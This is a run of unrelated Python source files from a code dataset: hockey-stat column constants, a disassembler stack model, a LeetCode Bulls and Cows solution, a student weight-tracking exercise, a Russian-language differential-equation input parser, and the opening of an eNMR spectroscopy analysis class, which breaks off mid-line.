7\nSKATER_DB_ON_ICE_CF_PERCENT = 8\nSKATER_DB_ON_ICE_FF = 9\nSKATER_DB_ON_ICE_FA = 10\nSKATER_DB_ON_ICE_FF_PERCENT = 11\nSKATER_DB_ON_ICE_SF = 12\nSKATER_DB_ON_ICE_SA = 13\nSKATER_DB_ON_ICE_SF_PERCENT = 14\nSKATER_DB_ON_ICE_GF = 15\nSKATER_DB_ON_ICE_GA = 16\nSKATER_DB_ON_ICE_GF_PERCENT = 17\nSKATER_DB_ON_ICE_xGF = 18\nSKATER_DB_ON_ICE_xGA = 19\nSKATER_DB_ON_ICE_xGF_PERCENT = 20\nSKATER_DB_ON_ICE_SCF = 21\nSKATER_DB_ON_ICE_SCA = 22\nSKATER_DB_ON_ICE_SCF_PERCENT = 23\nSKATER_DB_ON_ICE_HDCF = 24\nSKATER_DB_ON_ICE_HDCA = 25\nSKATER_DB_ON_ICE_HDCF_PERCENT = 26\nSKATER_DB_ON_ICE_OZS = 45\nSKATER_DB_ON_ICE_NZS = 46\nSKATER_DB_ON_ICE_DZS = 47\nSKATER_DB_ON_ICE_OZS_PERCENT = 49\nSKATER_DB_ON_ICE_OZFO = 50\nSKATER_DB_ON_ICE_NZFO = 51\nSKATER_DB_ON_ICE_DZFO = 52\nSKATER_DB_ON_ICE_OZFO_PERCENT = 53\nSKATER_DB_ON_ICE_LENGTH = 54\n\n'''\nRelative stats from naturalstattrick.com\n'''\nglobal SKATER_DB_RELATIVE_NAME\nglobal SKATER_DB_RELATIVE_TEAM_ID\nglobal SKATER_DB_RELATIVE_CF_PER_60\nglobal SKATER_DB_RELATIVE_CA_PER_60\nglobal SKATER_DB_RELATIVE_CF_PCG\nglobal SKATER_DB_RELATIVE_FF_PER_60\nglobal SKATER_DB_RELATIVE_FA_PER_60\nglobal SKATER_DB_RELATIVE_FF_PCG\nglobal SKATER_DB_RELATIVE_SF_PER_60\nglobal SKATER_DB_RELATIVE_SA_PER_60\nglobal SKATER_DB_RELATIVE_SF_PCG\nglobal SKATER_DB_RELATIVE_GF_PER_60\nglobal SKATER_DB_RELATIVE_GA_PER_60\nglobal SKATER_DB_RELATIVE_GF_PCG\nglobal SKATER_DB_RELATIVE_xGF_PER_60\nglobal SKATER_DB_RELATIVE_XGA_PER_60\nglobal SKATER_DB_RELATIVE_xGF_PCG\nglobal SKATER_DB_RELATIVE_SCF_PER_60\nglobal SKATER_DB_RELATIVE_SCA_PER_60\nglobal SKATER_DB_RELATIVE_SCF_PCG\nSKATER_DB_RELATIVE_NAME = 1\nSKATER_DB_RELATIVE_TEAM_ID = 2\nSKATER_DB_RELATIVE_CF_PER_60 = 7\nSKATER_DB_RELATIVE_CA_PER_60 = 8\nSKATER_DB_RELATIVE_CF_PCG = 9\nSKATER_DB_RELATIVE_FF_PER_60 = 10\nSKATER_DB_RELATIVE_FA_PER_60 = 11\nSKATER_DB_RELATIVE_FF_PCG = 12\nSKATER_DB_RELATIVE_SF_PER_60 = 13\nSKATER_DB_RELATIVE_SA_PER_60 = 14\nSKATER_DB_RELATIVE_SF_PCG = 15\nSKATER_DB_RELATIVE_GF_PER_60 = 16\nSKATER_DB_RELATIVE_GA_PER_60 = 17\nSKATER_DB_RELATIVE_GF_PCG = 18\nSKATER_DB_RELATIVE_xGF_PER_60 = 19\nSKATER_DB_RELATIVE_XGA_PER_60 = 20\nSKATER_DB_RELATIVE_xGF_PCG = 21\nSKATER_DB_RELATIVE_SCF_PER_60 = 22\nSKATER_DB_RELATIVE_SCA_PER_60 = 23\nSKATER_DB_RELATIVE_SCF_PCG = 24\n'''\nGoalie-DB from naturalstattrick.com\n'''\nglobal GOALIE_DB_NAME\nglobal GOALIE_DB_TEAM_ID\nglobal GOALIE_DB_GP\nglobal GOALIE_DB_TOI\nglobal GOALIE_DB_SA\nglobal GOALIE_DB_SV\nglobal GOALIE_DB_GA\nglobal GOALIE_DB_SV_PCG\nglobal GOALIE_DB_GAA\nglobal GOALIE_DB_GSAA\nglobal GOALIE_DB_XGA\nglobal GOALIE_DB_AVG_SHOT_DIST\nglobal GOALIE_DB_AVG_GOAL_DIST\nGOALIE_DB_NAME = 1\nGOALIE_DB_TEAM_ID = 2\nGOALIE_DB_GP = 3\nGOALIE_DB_TOI = 4\nGOALIE_DB_SA = 5\nGOALIE_DB_SV = 6\nGOALIE_DB_GA = 7\nGOALIE_DB_SV_PCG = 8\nGOALIE_DB_GAA = 9\nGOALIE_DB_GSAA = 10\nGOALIE_DB_XGA = 11\nGOALIE_DB_AVG_SHOT_DIST = 30\nGOALIE_DB_AVG_GOAL_DIST = 31\nGOALIE_DB_LENGTH = 32\n\n'''\nTeam-DB from naturalstattrick.com\nColumns:\n0-10: 0,\"Team\",\"GP\",\"TOI\",\"W\",\"L\",\"OTL\",\"ROW\",\"Points\",\"Point %\",\"CF\",\n11-20: \"CA\",\"CF%\",\"FF\",\"FA\",\"FF%\",\"SF\",\"SA\",\"SF%\",\"GF\",\"GA\",\n21-30: \"GF%\",\"xGF\",\"xGA\",\"xGF%\",\"SCF\",\"SCA\",\"SCF%\",\"SCSF\",\"SCSA\",\"SCSF%\",\n31-40: \"SCGF\",\"SCGA\",\"SCGF%\",\"SCSH%\",\"SCSV%\",\"HDCF\",\"HDCA\",\"HDCF%\",\"HDSF\",\"HDSA\",\n41-50: \"HDSF%\",\"HDGF\",\"HDGA\",\"HDGF%\",\"HDSH%\",\"HDSV%\",\"MDCF\",\"MDCA\",\"MDCF%\",\"MDSF\",\n51-60: \"MDSA\",\"MDSF%\",\"MDGF\",\"MDGA\",\"MDGF%\",\"MDSH%\",\"MDSV%\",\"LDCF\",\"LDCA\",\"LDCF%\",\n61-70: \"LDSF\",\"LDSA\",\"LDSF%\",\"LDGF\",\"LDGA\",\"LDGF%\",\"LDSH%\",\"LDSV%\",\"SH%\",\"SV%\",\n71-80: \"PDO\"\n'''\nglobal TEAM_DB_NAME_COL\nglobal TEAM_DB_GP_COL\nglobal TEAM_DB_TOI_COL\nglobal TEAM_DB_W_COL\nglobal TEAM_DB_L_COL\nglobal TEAM_DB_OTL_COL\nglobal TEAM_DB_ROW_COL\nglobal TEAM_DB_P_COL\nglobal TEAM_DB_P_PCG_COL\nglobal TEAM_DB_CF_COL\nglobal TEAM_DB_CA_COL\nglobal TEAM_DB_CF_PCG_COL\nglobal TEAM_DB_SF_COL\nglobal TEAM_DB_SA_COL\nglobal TEAM_DB_SF_PCG_COL\nglobal TEAM_DB_GF_COL\nglobal TEAM_DB_GA_COL\nglobal TEAM_DB_GF_PCG_COL\nglobal TEAM_DB_FF_COL\nglobal TEAM_DB_FA_COL\nglobal TEAM_DB_FF_PCG_COL\nglobal TEAM_DB_SCF_COL\nglobal TEAM_DB_SCA_COL\nglobal TEAM_DB_SCF_PCG_COL\nglobal TEAM_DB_xGF_COL\nglobal TEAM_DB_xGA_COL\nglobal TEAM_DB_xGF_PCG_COL\nglobal TEAM_DB_HDCF_COL\nglobal TEAM_DB_HDCA_COL\nglobal TEAM_DB_HDCF_PCG_COL\nglobal TEAM_DB_SV_PCG_COL\nglobal TEAM_DB_PDO_COL\nglobal P_PCG_FACTOR\nTEAM_DB_NAME_COL = 1\nTEAM_DB_GP_COL = 2\nTEAM_DB_TOI_COL = 3\nTEAM_DB_W_COL = 4\nTEAM_DB_L_COL = 5\nTEAM_DB_OTL_COL = 6\nTEAM_DB_ROW_COL = 7\nTEAM_DB_P_COL = 8\nTEAM_DB_P_PCG_COL = 9\nTEAM_DB_CF_COL = 10\nTEAM_DB_CA_COL = 11\nTEAM_DB_CF_PCG_COL = 12\nTEAM_DB_FF_COL = 13\nTEAM_DB_FA_COL = 14\nTEAM_DB_FF_PCG_COL = 15\nTEAM_DB_SF_COL = 16\nTEAM_DB_SA_COL = 17\nTEAM_DB_SF_PCG_COL = 18\nTEAM_DB_GF_COL = 19\nTEAM_DB_GA_COL = 20\nTEAM_DB_GF_PCG_COL = 21\nTEAM_DB_xGF_COL = 22\nTEAM_DB_xGA_COL = 23\nTEAM_DB_xGF_PCG_COL = 24\nTEAM_DB_SCF_COL = 25\nTEAM_DB_SCA_COL = 26\nTEAM_DB_SCF_PCG_COL = 27\nTEAM_DB_HDCF_COL = 36\nTEAM_DB_HDCA_COL = 37\nTEAM_DB_HDCF_PCG_COL = 38\nTEAM_DB_SV_PCG_COL = 70\nTEAM_DB_PDO_COL = 71\nTEAM_DB_LENGTH = 72\nP_PCG_FACTOR = 0.25 \t\t# This defines how much/little the point% of the season should be weighted in to the rating.","repo_name":"TobiasSolbeckar/nhl","sub_path":"nhl_defines.py","file_name":"nhl_defines.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70892199505","text":"class StackItem():\n ''' An item on the stack '''\n def __init__(self, width, what):\n self.width = width\n self.what = what\n self.stack = None\n self.blob = None\n\n def __str__(self):\n if self.what is None:\n return \"[-%d-]\" % self.width\n return str([self.width, self.what])\n\nclass StackItemInt(StackItem):\n ''' A 16 bit integer '''\n def __init__(self, val):\n super().__init__(2, \"#\" + str(val))\n self.val = val\n\n def __str__(self):\n return \"[#%d]\" % self.val\n\nclass StackItemLong(StackItem):\n ''' A 32 bit integer '''\n def __init__(self, val):\n super().__init__(4, \"##\" + str(val))\n self.val = val\n\n def __str__(self):\n return \"[##%d]\" % self.val\n\nclass FrameItemReference(StackItem):\n ''' A Pointer to something on the frame'''\n def __init__(self, offset):\n super().__init__(4, \"@@\" + str(offset))\n self.backref = offset\n\n def __str__(self):\n return \"[@@%d]\" % self.backref\n\nclass StackItemReference(StackItem):\n ''' A Pointer to something further up the stack '''\n def __init__(self, offset):\n super().__init__(4, \"^^\" + str(offset))\n self.backref = offset\n\n def __str__(self):\n return \"[^^%d]\" % self.backref\n\nclass StackItemString(StackItem):\n ''' A String on the stack '''\n def __init__(self, text=None):\n super().__init__(4, \"$…\")\n self.text = text\n\n def __str__(self):\n if self.text:\n return \"[$$%s]\" % self.text\n return \"[$$…]\"\n\nclass StackItemBlob(StackItem):\n ''' A pushed object '''\n\n def __init__(self, blob=None, width=None, src=None):\n if blob:\n width = len(blob)\n super().__init__(width, \"**(%d)**\" % width)\n self.blob = blob\n self.src = src\n\n def __str__(self):\n if not self.blob:\n return '[«' + str(self.width) + '»]'\n txt = ''\n if False:\n for i in self.blob:\n if 32 <= i <= 126 and i != 92:\n txt += \"%c\" % i\n else:\n txt += \"\\\\x%02x\" % i\n return '[«%d\"' % self.width + txt + '\"»]'\n\n def __getitem__(self, idx):\n if self.blob:\n return self.blob[idx]\n return None\n\nclass StackItemStringLiteral(StackItem):\n ''' A pushed String Literal '''\n\n def __str__(self):\n return \"[\" + str(self.width) + ', \"' + self.what + '\"]'\n\nclass Stack():\n ''' A model of the stack '''\n def __init__(self):\n self.items = []\n self.mangled = False\n\n def push(self, item):\n ''' Push an item onto the stack '''\n if self.mangled:\n return\n assert isinstance(item.width, int)\n item.stack = self\n if item.what is None and self.items and self.items[-1].what == item.what:\n self.items[-1].width += item.width\n else:\n self.items.append(item)\n\n def pop(self, width):\n ''' Push width worth of items off the stack '''\n if self.mangled:\n return\n while self.items and self.items[-1].width <= width:\n width -= self.items[-1].width\n self.items.pop(-1)\n while width > 0 and self.items:\n last = self.items[-1]\n if last.what is not None:\n last = StackItem(last.width, None)\n last.stack = self\n self.items[-1] = last\n take = min(last.width, width)\n self.items[-1].width -= take\n if self.items[-1].width == 0:\n self.items.pop(-1)\n width -= take\n if width:\n print(\"EMPTY POP\", width, self.render())\n self.mangled = True\n\n def find(self, offset, width):\n ''' Find item on stack, rearrange if necessary '''\n if self.mangled:\n return 0, None\n ptr = len(self.items) - 1\n #print(\"A\", offset, width, ptr, self.render())\n while offset > 0 and ptr >= 0:\n sitem = self.items[ptr]\n if sitem.width <= offset:\n ptr -= 1\n offset -= sitem.width\n continue\n break\n #print(\"B\", offset, width, ptr, self.render())\n if ptr < 0:\n return 0, None\n sitem = self.items[ptr]\n if offset and sitem.width > offset:\n nitem = StackItem(offset, None)\n nitem.stack = self\n self.items.insert(ptr + 1, nitem)\n sitem.width -= offset\n offset = 0\n #print(\"C\", offset, width, ptr, self.render())\n if sitem.width == width:\n return ptr, sitem\n while sitem.width < width:\n pitem = self.items[ptr - 1]\n sitem = StackItem(sitem.width + pitem.width, None)\n sitem.stack = self\n ptr -= 1\n self.items[ptr] = sitem\n self.items.pop(ptr + 1)\n #print(\"D\", offset, width, ptr, self.render())\n if sitem.width == width:\n return ptr, sitem\n nitem = StackItem(width, None)\n nitem.stack = self\n sitem.width -= width\n self.items.insert(ptr + 1, nitem)\n #print(\"E\", offset, width, ptr, self.render())\n return ptr + 1, nitem\n\n def get(self, offset, width):\n ''' Get width item at offset '''\n _ptr, item = self.find(offset, width)\n return item\n\n def put(self, offset, item):\n ''' Put item at offset '''\n ptr, sitem = self.find(offset, item.width)\n if sitem is not None:\n self.items[ptr] = item\n elif not self.mangled:\n print(\"BAD PUT\", offset, item, self.render())\n self.mangled = True\n\n def render(self):\n ''' Render stack image '''\n if self.mangled:\n return \"{MANGLED}\"\n return \"{\" + \"|\".join(str(x) for x in self.items) + \"}\"\n\n def getbytes(self, offset, width):\n ''' Get bytes from stack '''\n idx = len(self.items) - 1\n while self.items[idx].width <= offset:\n #print(\"**\", offset, idx, width, self.items[idx], self.items[idx].width)\n offset -= self.items[idx].width\n idx -= 1\n #print(\"**\", offset, idx, self.items[idx])\n if offset and self.items[idx].width > offset:\n return None\n assert offset == 0\n retval = bytearray()\n item = self.items[idx]\n ptr = 0\n for n in range(width):\n #print(\"##\", n, width, item, ptr, retval)\n if ptr >= item.width:\n idx -= 1\n item = self.items[idx]\n ptr = 0\n if not item.blob:\n return None\n retval.append(item.blob[ptr])\n ptr += 1\n return retval\n","repo_name":"Datamuseum-DK/R1000.Disassembly","sub_path":"DFS/omsi/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8519344220","text":"# 你正在和你的朋友玩 猜数字(Bulls and Cows)游戏:你写下一个数字让你的朋友猜。每次他猜测后,你给他一个提示,告诉他有多少位数字和确切位置都猜对了(称为“Bulls”, 公牛),有多少位数字猜对了但是位置不对(称为“Cows”, 奶牛)。你的朋友将会根据提示继续猜,直到猜出秘密数字。\n#\n# 请写出一个根据秘密数字和朋友的猜测数返回提示的函数,用 A 表示公牛,用 B 表示奶牛。\n#\n# 请注意秘密数字和朋友的猜测数都可能含有重复数字。\n#\n# 示例 1:\n#\n# 输入: secret = \"1807\", guess = \"7810\"\n#\n# 输出: \"1A3B\"\n#\n# 解释: 1 公牛和 3 奶牛。公牛是 8,奶牛是 0, 1 和 7。\n#\n# 示例 2:\n#\n# 输入: secret = \"1123\", guess = \"0111\"\n#\n# 输出: \"1A1B\"\n#\n# 解释: 朋友猜测数中的第一个 1 是公牛,第二个或第三个 1 可被视为奶牛。\nclass Solution(object):\n def getHint(self, secret, guess):\n \"\"\"\n :type secret: str\n :type guess: str\n :rtype: str\n \"\"\"\n\n guess = list(guess)\n secret = list(secret)\n for i in range(len(guess)):\n if guess[i] == secret[i]:\n secret[i] =\"A\"\n guess[i] = \"A\"\n A = {}\n B = {}\n for i in range(len(guess)):\n A[guess[i]] = A.get(guess[i], 0)+1\n for i in range(len(guess)):\n B[secret[i]] = B.get(secret[i], 0)+1\n\n b = 0\n for key in A.keys():\n if key in B:\n b = b+min(A[key],B[key])\n return str(secret.count(\"A\")) +\"A\"+str(b-A.get(\"A\", 0))+\"B\"\n\ns = Solution()\nprint(s.getHint(secret = \"1\", guess = \"0\"))\n\n\n","repo_name":"heshibo1994/leetcode-python-2","sub_path":"299猜数字游戏.py","file_name":"299猜数字游戏.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9728130547","text":"nome = ''\r\npeso = ''\r\ncadastro = list()\r\nresposta = ''\r\ntot_pessoas = 0\r\nmaior = 0\r\nmenor = 0\r\n\r\nwhile resposta != 'n':\r\n nome = str(input('Informe o nome: '))\r\n peso = float(input('Informe o peso: '))\r\n cadastro.append(nome)\r\n cadastro.append(peso)\r\n resposta = str(input('Deseja continuar [S/N]? ')).strip().lower()[0]\r\n tot_pessoas = tot_pessoas + 1\r\n\r\nprint(f'Ao todo foram cadastradas {tot_pessoas} pessoas.') \r\n\r\nfor i in range(1, len(cadastro), 2):\r\n if i == 1:\r\n menor = cadastro[i]\r\n \r\n if cadastro[i] > maior:\r\n maior = cadastro[i]\r\n\r\n if cadastro[i] < menor:\r\n menor = cadastro[i]\r\n\r\nprint(f'O maior peso foi {maior:.1f} e pertence a ', end=' ')\r\nfor c in range(1, len(cadastro), 2):\r\n if cadastro[c] == maior:\r\n print(cadastro[c - 1], end= \", \")\r\n\r\nprint(f'\\nO menor peso foi {menor} e pertence a ', end=' ')\r\nfor d in range(1, len(cadastro), 2):\r\n if cadastro[d] == menor:\r\n print(cadastro[d - 1], end=', ')\r\n","repo_name":"joaobosco2011/Python-Learning","sub_path":"ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15018489130","text":"import random\r\nimport math\r\n\r\n\r\ndef zerodiv(fun):\r\n count = 0\r\n for j in range(30):\r\n x, y, z, u, v = [random.randint(-100001, 100001)] * 5\r\n try:\r\n eval(fun)\r\n except ZeroDivisionError:\r\n count += 1\r\n except ValueError:\r\n continue\r\n if count == 20:\r\n return True\r\n return False\r\n\r\n\r\ndef valuer(fun):\r\n count = 0\r\n for j in range(30):\r\n x, y, z, u, v = [random.randint(-100001, 100001)] * 5\r\n try:\r\n eval(fun)\r\n except ValueError:\r\n count += 1\r\n except ZeroDivisionError:\r\n continue\r\n if count == 20:\r\n return True\r\n return False\r\n\r\n\r\ndef diff_input():\r\n \"\"\"\r\n Ввод для дифференциального уравнение I порядка вида: y'=f(x,y) или систем таких уравнений\r\n Либо для ДУ II порядка вида: y'=f(x,y,y')\r\n Начальное условие вида: y(m) = ... | x ∈ [m, ...]\r\n Точность задаётся целым числом\r\n :return: [f(x,y,...),...] | [y(0), z[0],...] | x∈[a, b] | точность(n)\r\n \"\"\"\r\n\r\n flag = False\r\n while not flag:\r\n system = None\r\n print('Введите кол-во уравнений в системе (от 1 до 4): ')\r\n while system is None:\r\n try:\r\n count = int(input('Количество уравнений: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n system = count\r\n\r\n mode = None\r\n if system == 1:\r\n print('Для систем из 1 уравнения предусмотрена возможность ввести ДУ 1-ого/2-ого порядка на выбор')\r\n while mode is None:\r\n try:\r\n digit = int(input('Порядок уравнения: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n mode = digit\r\n\r\n if mode == 2:\r\n fun = input('Введите функцию: ')\r\n fun = fun.lower()\r\n fun = fun.replace(\"y\\'\", \"z\")\r\n\r\n func1, func2, func3, func4 = [None] * 4\r\n y0, z0, u0, v0 = [None] * 4\r\n if mode == 2:\r\n for_func = ['z', fun]\r\n else:\r\n for_func = [func1, func2, func3, func4]\r\n\r\n for_yzuv = [y0, z0, u0, v0]\r\n a, b, n = [None] * 3\r\n\r\n # 1-ый блок, вводим функцию\r\n func_string = ['y', 'z', 'u', 'v']\r\n string = ', '.join(func_string[0:system])\r\n answer_func = []\r\n if mode == 2:\r\n system = mode\r\n\r\n for i in range(0, system):\r\n func = for_func[i]\r\n c = 0\r\n while func is None or (mode == 2 and c == 0):\r\n if mode != 2:\r\n fun = input(f'Введите функцию d{func_string[i]}/dx = f(x, {string}): ')\r\n else:\r\n fun = func\r\n\r\n if '^' in fun:\r\n fun = fun.replace('^', '**')\r\n fun = fun.lower()\r\n\r\n plan = ['e', 'pi', 'sin', 'cos', 'tan', 'log']\r\n dict_replace = {i: 'math.' + i for i in plan}\r\n dict_replace['tg'] = 'math.tan'\r\n dict_replace['ln'] = 'math.log'\r\n dict_replace['ctan'] = '1/math.tan'\r\n dict_replace['ctg'] = '1/math.tan'\r\n\r\n for item in dict_replace:\r\n if item in fun:\r\n fun = fun.replace(item, dict_replace[item])\r\n\r\n # проверяем есть ли лишние буквы\r\n alphabet0 = ['z', 'u', 'v', 'j', 'k', 'q', 'r', 'b', 'd', 'w', 'f', 'f']\r\n for j in range(0, system-1):\r\n alphabet0[j] = 'j'\r\n alphabet1 = ['t', 'a', 'p', 'i', 's', 'n', 'c', 'o', 'l', 'g', 'h', 'm']\r\n alphabet2 = {\r\n 't': ['math', 'tan'], 'a': ['math', 'tan'], 'p': ['pi'], 'i': ['sin', 'pi'],\r\n 's': ['sin', 'cos'], 'n': ['tan', 'sin'], 'c': ['cos'], 'o': ['cos', 'log'],\r\n 'l': ['log'], 'g': ['log'], 'h': ['math'], 'm': ['math']\r\n }\r\n\r\n for letter in range(len(alphabet0)):\r\n if alphabet0[letter] in fun:\r\n print('У вас есть лишние переменные/символы букв')\r\n break\r\n let = alphabet1[letter]\r\n if fun.count(let) > sum(list(map(lambda x: fun.count(x), alphabet2[let]))):\r\n print('У вас есть лишние переменные/символы букв')\r\n break\r\n else: # сюда заходим, если for закончился без break\r\n x, y, z, u, v = [1] * 5 # проверяем ошибки при вызове eval()\r\n flag_2 = False\r\n try:\r\n eval(fun)\r\n except (SyntaxError, NameError, AttributeError):\r\n print('Синтаксическая ошибка!')\r\n flag_2 = True\r\n except ValueError:\r\n if valuer(fun):\r\n print('Скорее всего в вашей формуле статическая ошибка в логарифме, исправьте её')\r\n flag_2 = True\r\n except ZeroDivisionError:\r\n if zerodiv(fun):\r\n print('Скорее всего в вашей формуле статическое деление на ноль')\r\n flag_2 = True\r\n except TypeError:\r\n print('Неправильное использование мат. функций (проверьте ваши логарифмы и триг. ф-ции)')\r\n flag_2 = True\r\n\r\n if flag_2:\r\n func = None\r\n if not flag_2:\r\n answer_func.append(fun)\r\n func = fun\r\n c = 1\r\n\r\n if mode == 2:\r\n print('Ваше уравнение было превращено в систему: ')\r\n print(\"{\" + f'y\\' = {answer_func[0]}')\r\n print(\"{\" + f'z\\' = {answer_func[1]}')\r\n\r\n # 2-ой блок, здесь будет ввод начальных условий\r\n while a is None or b is None:\r\n try:\r\n aa, bb = map(float, input('\\nВведите 2 числа через пробел - начало и конец отрезка.'\r\n '\\nКонцы включены. Разделитель целой и дробной части - точка').split())\r\n except ValueError:\r\n print('Введите значения в правильном формате!')\r\n continue\r\n\r\n a, b = aa, bb\r\n\r\n answer_yzuv = []\r\n for i in range(0, system):\r\n yzuv = for_yzuv[i]\r\n while yzuv is None:\r\n try:\r\n some_func = float(input(f'\\nВведите {func_string[i]}({a}): '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n yzuv = some_func\r\n answer_yzuv.append(yzuv)\r\n\r\n # 3-ий блок, здесь будет ввод точности\r\n while n is None:\r\n try:\r\n s = int(input('\\nВведите число n в ряде x0, x1, ..., xn: '))\r\n except ValueError:\r\n print('Введите значение в правильном формате!')\r\n continue\r\n if s <= 0:\r\n print('Количество не может быть <= 0')\r\n continue\r\n else:\r\n n = s\r\n\r\n print('\\nЕсли вы согласны с введёнными значениями и хотите завершить ввод, впишите любой символ/слово')\r\n print('В противном случае, напишите \"NO\" и вы начнёте с первого шага')\r\n check_input = input()\r\n if check_input != 'NO':\r\n return answer_func, answer_yzuv, [a, b], n\r\n elif check_input.lower() == 'no':\r\n continue\r\n\r\n\r\nif __name__ == '__main__':\r\n print(diff_input())\r\n","repo_name":"SMALA-comand/Differential_equations","sub_path":"differential_input.py","file_name":"differential_input.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35498077685","text":"## coding: utf-8\n# This is the eNMR class. THE library for the evaluation of bruker-eNMR-spectra based on the VC-PowerSource of the\n# Schönhoff working group.\n# It works with the volt-increment method which calculates the respective voltage with the VC-list\n# Further Implementation can be asked for at f_schm52@wwu.de\nfrom .eNMR_Methods import _eNMR_Methods\nimport matplotlib.pyplot as plt\nfrom .base import Measurement\nfrom re import findall\nimport numpy as np\nimport pandas as pd\n \n\n#class eNMR_Emma(eNMR_Measurement):\nclass eNMR_Emma(_eNMR_Methods):\n #'''\n #This is the subsubclass of Masurement() and subclass of eNMR_Methods specialised to process data obtained from the experimental Schönhoff set-up\n \n #path:\n #relative or absolute path to the measurements folder\n #measurement:\n #the to the experiment corresponding EXPNO\n #alias:\n #Here you can place an individual name relevant for plotting. If None, the path is taken instead. \n #Uink:\n #voltage increment. Usually extracted from the title file if defined with e.g. \"Uink = 10V\"\n #If Uink cannot be found or is wrong it can be entered manually during the data import.\n #The voltage list is calculated from the voltage increment and the vc list when the incrementation loop is used in the pulse program\n #dependency:\n #'U': voltage dependent eNMR measurement\n #'G': fieldgradient dependent eNMR measurement\n\n #linebroadening:\n #setting a standard-value for the linebroadening.\n #'''\n def __init__(self, path, expno, Uink=None, dependency=\"U\", alias=None, lineb=0.5, electrode_distance=2.2e-2):\n Measurement.__init__(self, path, expno, lineb=lineb, alias=alias)\n self.dependency = dependency.upper()\n \n self._x_axis = {\"U\": \"U / [V]\",\n \"G\": \"g in T/m\",\n \"I\": \"I / mA\",\n 'RI': 'RI / V'\n }[self.dependency.upper()]\n \n #self._x_axis = {\"G\": \"g in T/m\",\n #\"U\": \"U / [V]\"}[self.dependency.upper()]\n \n self.difflist = pd.read_csv(self.dateipfad+\"/difflist\",\n names=[\"g in T/m\"])*0.01\n \n self.vcList = pd.DataFrame()\n \n if self.dic['acqus']['PULPROG'][-3:] == 'var':\n polarity = 1\n print('this is a regular measurement! (non-_pol)')\n elif self.dic['acqus']['PULPROG'][-3:] == 'pol':\n polarity = -1\n print('this is a _pol-Measurement!')\n else:\n print(\"no var or pol PULPROG\")\n \n if dependency.upper() == \"U\":\n try:\n # takes the title page to extract the volt increment\n title = open(self.dateipfad+\"/pdata/1/title\").read()\n # gets the voltage increment using a regular expression\n #uimport = findall('[U|u]in[k|c]\\s*=?\\s*\\d+', title)[0]\n uimport = findall('[U|u]in[k|c]\\s*=+\\s*\\d+', title)[0]\n self.uInk = int(findall('\\d+', uimport)[0])\n except ValueError:\n print('no volt increment found\\nyou may want to put it in manually')\n self.uInk = Uink\n except IndexError:\n print('No Uink found! May not be an eNMR experiment.')\n self.uInk = Uink\n \n self.vcList[\"U / [V]\"] = [i*self.uInk*polarity for i in range(len(self.difflist))]\n \n elif dependency.upper() == \"G\":\n try:\n # takes the title page to extract the volt increment\n title = open(self.dateipfad+\"/pdata/1/title\").read()\n # gets the voltage increment using a regular expression\n uimport = findall('[U|u]\\s*=?\\s*\\d+', title)[0]\n self.uInk = int(findall('\\d+', uimport)[0])\n\n except ValueError:\n print('no volt increment found\\nyou may want to put it in manually')\n self.uInk = Uink\n except IndexError:\n print('No Uink found! May not be an eNMR experiment.')\n self.uInk = Uink # Uinktext\n \n #if Uink is not None:\n #self.uInk = Uink\n \n self.vcList[\"U / [V]\"] = [self.uInk*polarity for i in range(len(self.difflist))]\n #self.vcList[\"U / [V]\"] = [self.vcList[\"vc\"][n]/2*self.uInk if self.vcList[\"vc\"][n] % 2 == 0\n #else (self.vcList[\"vc\"][n]+1)/2*self.uInk*-1\n #for n in range(len(self.data[:, 0]))]\n\n #if self.dependency.upper() == \"U\":\n #try:\n #self.vcList = pd.read_csv(self.dateipfad+\"/vclist\",\n #names=[\"vc\"]).loc[:len(self.data[:, 0])-1]\n \n #except:\n #print(\"There is a Problem with the VC-list or you performed a gradient dependent measurement\")\n #elif self.dependency.upper() == \"G\":\n #self.vcList = pd.DataFrame(np.ones((len(self.data[:, 0]), 1)),\n #columns=[\"vc\"])\n #else:\n #print(\"The dependency is not properly selected, try again!\")\n\n #self.difflist = pd.read_csv(self.dateipfad+\"/difflist\",\n #names=[\"g in T/m\"])*0.01\n \n #if Uink is not None:\n #self.uInk = Uink\n \n #self.vcList[\"U / [V]\"] = [self.vcList[\"vc\"][n]/2*self.uInk if self.vcList[\"vc\"][n] % 2 == 0\n #else (self.vcList[\"vc\"][n]+1)/2*self.uInk*-1\n #for n in range(len(self.data[:, 0]))]\n \n # try to open phase data, otherwise create new\n try:\n self.eNMRraw = pd.read_csv(self.path+\"phase_data_\"+self.expno+\".csv\",\n index_col=0, sep=\" \")\n # --> update voltage list\n self.eNMRraw[\"U / [V]\"] = self.vcList[\"U / [V]\"]\n except:\n print(\"eNMRraw was missing and is generated\")\n self.vcList[\"ph0\"] = np.zeros(len(self.data.real[:, 0]))\n self.eNMRraw = self.vcList\n finally:\n self.eNMRraw[\"g in T/m\"] = self.difflist\n \n self.p1 = self.dic[\"acqus\"][\"P\"][1]\n self.d1 = self.dic[\"acqus\"][\"D\"][1]\n \n try:\n # import of diffusion parameters for newer Spectrometers\n import xml.etree.ElementTree as etree\n diffpar = etree.parse(self.dateipfad+'/diff.xml')\n root = diffpar.getroot()\n self.Delta = float(root.findall('DELTA')[0].text)*1e-3\n self.delta = float(root.findall('delta')[0].text)*1e-3 # it should be read as in microseconds at this point due to bruker syntax\n print('The diffusion parameters were read from the respectie .XML!')\n except:\n # determination of the diffusion parameters for Emma\n self._d2 = self.dic[\"acqus\"][\"D\"][2]\n self._d5 = self.dic[\"acqus\"][\"D\"][5]\n self._d9 = self.dic[\"acqus\"][\"D\"][9]\n self._d11 = self.dic[\"acqus\"][\"D\"][11]\n self._p19, self._p18, self._p17 = 